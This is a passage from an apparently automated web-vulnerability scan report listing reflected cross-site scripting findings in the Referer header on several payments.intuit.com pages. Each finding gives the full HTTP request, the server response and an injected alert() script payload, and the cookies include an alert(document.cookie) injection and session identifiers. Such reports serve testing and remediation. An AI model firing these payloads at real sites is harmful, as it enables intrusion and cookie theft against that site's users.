Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=iwPi7b+G6IfPR6znHCFUhg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C5B0E0A0805192AA117E38A762F0C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93324


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e';
                   </script>
...[SNIP]...

2.77. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/contact-me.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 23a44--><script>alert(1)</script>72e2675b5fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pM50lYZPFnVXgi0T1ha39Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CA4950A0805192AA117E3F21B5F83
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93356

...[SNIP]...
<script>alert(1)</script>72e2675b5fc | -->
...[SNIP]...

2.78. http://payments.intuit.com/products/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 50367--><script>alert(1)</script>6c1e00f3f20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=50367--><script>alert(1)</script>6c1e00f3f20

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=M3gX+mVoiuIkcOt8Esi4Yg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B59C30A0805192AA117E3428028B0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90447

...[SNIP]...
<script>alert(1)</script>6c1e00f3f20 | -->
...[SNIP]...

2.79. http://payments.intuit.com/products/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70e9a'-alert(1)-'1f622a992cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:04 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=DO4qqh6ksP6Oy77tMujZxg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:05 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B06050A0805192AA117E3BEDF55B4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90415


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd';
                   </script>
...[SNIP]...

2.80. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab319'-alert(1)-'38984c7dc20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:42 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=YrtBHerYg+WK2DeOsiYbiA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:43 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C84210A0805192AA117E3CFC85132
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92653


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20';
                   </script>
...[SNIP]...

2.81. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3d056--><script>alert(1)</script>4284ad0a88b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ApFXrC+jgFomvNBkwIsCdQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CB3320A0805192AA117E345C63285
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92685

...[SNIP]...
<script>alert(1)</script>4284ad0a88b | -->
...[SNIP]...

2.82. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50dd9'-alert(1)-'453e9ddad06 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=o9l6YwbE43TpqpZCRKPeTA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E12360A0805192AA117E3B77CA933
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101820


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06';
                   </script>
...[SNIP]...

2.83. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d6539--><script>alert(1)</script>9940cd93a6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=SH8LGCxMaF5781x2Vulb3Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E55E90A0805192AA117E31B06669E
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101853

...[SNIP]...
<script>alert(1)</script>9940cd93a6a | -->
...[SNIP]...

2.84. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fffd5'-alert(1)-'a1adc0270af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:11 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ZLWBpsz-5u6FkdN2z8+SNg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:12 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9609DEA0A0805192AA117E3D7AC7FC0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134929


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af';
                   </script>
...[SNIP]...

2.85. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
